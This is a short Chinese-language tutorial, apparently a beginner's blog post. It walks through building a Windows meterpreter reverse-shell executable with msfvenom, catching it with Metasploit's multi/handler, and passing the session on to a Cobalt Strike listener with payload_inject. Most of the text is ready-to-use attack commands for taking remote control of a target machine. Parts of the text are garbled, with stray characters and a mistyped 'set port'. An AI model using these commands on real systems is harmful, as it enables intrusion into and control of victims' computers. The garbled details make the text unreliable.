1 msf獲取shell
這里已經(jīng)在用msf生成了exe
然后直接msf開(kāi)啟監(jiān)聽(tīng)然后獲取shell
msf生成exe的payload為
msfvenom -p windows/meterpreter/reverse_tcp LHOST=<Your IP Address> LPORT=<Your Port to Connect On> -f exe > shell.exe
然后msf進(jìn)行監(jiān)聽(tīng)開(kāi)始獲取shell
這里設(shè)置的端口要與自己生成exe的端口設(shè)置相同沿盅,否則會(huì)監(jiān)聽(tīng)失敗富弦。
use exploit/multi/handler
set payload windows/meterpreter/reverse_tcp
set lhost xx.xx.xx.xx(設(shè)置的ip地址)
set port xxxx(設(shè)置的端口號(hào))
run
然后在靶機(jī)上直接打開(kāi)exe即可战虏。
2 msf反彈shell到cs
background?
返回到msf操作界面。
如圖我們獲取的shell為session 1
我們?nèi)绻磸梥hell 到cs上的話
首先先在cs上設(shè)置一個(gè)監(jiān)聽(tīng)半开。
點(diǎn)擊耳麥圖標(biāo),然后EDIT
這里我選擇的是http方式連接,然后這次的port不用設(shè)置與生成exe的端口相同猾封,這里我的為1234,隨意多少都行。
然后我們開(kāi)始往cs上派生噪珊。
因?yàn)閏s上設(shè)置的為http連接晌缘,所以我們下邊payload也要對(duì)應(yīng)的設(shè)置為reverse_tcp
use?exploit/windows/local/payload_inject?
set?payload?windows/meterpreter/reverse_http
set lhost xx.xx.xx.xx(ip地址)
set lport 1234(cs設(shè)置監(jiān)聽(tīng)的端口)
set session 1(上邊我們獲取shell的session為1)
run
如圖cs上線成功
小白小白小白~
大佬勿噴~